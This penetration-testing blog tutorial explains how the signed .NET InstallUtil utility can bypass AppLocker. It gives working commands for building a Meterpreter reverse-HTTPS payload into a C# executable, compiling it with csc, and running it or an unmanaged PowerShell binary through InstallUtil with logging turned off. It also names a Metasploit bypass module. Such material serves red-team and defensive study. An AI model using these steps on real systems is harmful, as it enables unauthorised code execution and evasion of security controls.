by InstallUtil is a command line utility which is part of the .NET Framework and allows users to quickly install and uninstall applications via the command prompt. Since this utility is a Microsoft signed binary then it could be used to run any .NET executables bypassing in that way AppLocker restrictions. Also this utility is located inside the Windows folder which AppLocker policies are not going to be applied as the contents of the Windows folder are needed to be executed in order for the system to run normally.
This technique was discovered by Casey Smith which on top of that he did some further work by writing C# code that can be used to bypass AppLocker restrictions in order to run PowerShell through the InstallUtil binary.
Generating .NET Executables
The InstallUtil can run executables which are written in .NET language. There is python script written by khr0x40sh which imports Metasploit payloads generated by MSFvenom into a C# template and produces the .NET binary that can be used to evade AppLocker via InstallUtil.
python InstallUtil.py --cs_file pentestlab.cs --exe_file /root/Desktop/pentestlab.exe --payload windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443
The command above will generate a C# template which will include the Metasploit ShellCode.
The C# file can be compiled as an executable also via the csc binary of a system that is running .NET framework.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe pentestlab.cs
The compiled executable that contains the malicious payload can be then dropped on the target system. AppLocker prevents the file of being executed however through the Installutil this file is executed as normal and returns a Meterpreter session.
Metasploit
There is a specific Metasploit module which can be used to bypass AppLocker via the InstallUtil method.
exploit/windows/local/applocker_bypass
This module will generate a .NET executable on the target system and it will utilize the InstallUtil binary to execute the payload bypassing the AppLocker protection.
PowerShell
In environments where PowerShell is restricted by AppLocker Casey Smith did some further work and wrote C# code which can be used in conjunction with the InstallUtil bypass technique in order to run PowerShell commands and scripts.
The C# code can be compiled with the csc binary in order to produce a PowerShell executable.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\System.Management.Automation.dll /out:powershell.exe InstallUtil-PowerShell.cs
However in order for the above command to run it needs the System.Management.Automation.dll which can be found in one of the directories below:
C:\Windows\winsxs\msil_system.management.automation_31bf3856ad364e35_6.1.7601.17514_none_236c706c3e9 3d144 C:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35
The compiled PowerShell binary can be executed via the InstallUtil in order to execute PowerShell commands.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U powershell.exe
There is an additional improvement on this code which can be compiled as .DLL and it can take an optional parameter to run PowerShell scripts which are stored locally.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\System.Management.Automation.dll /out:pshell.dll C:\pshell.cs
Resources
https://github.com/khr0x40sh/WhiteListEvasion
https://www.rapid7.com/db/modules/exploit/windows/local/applocker_bypass
https://www.exploit-db.com/exploits/39523/
https://github.com/subTee/AllTheThings
Penetration Testing Lab 
2 Comments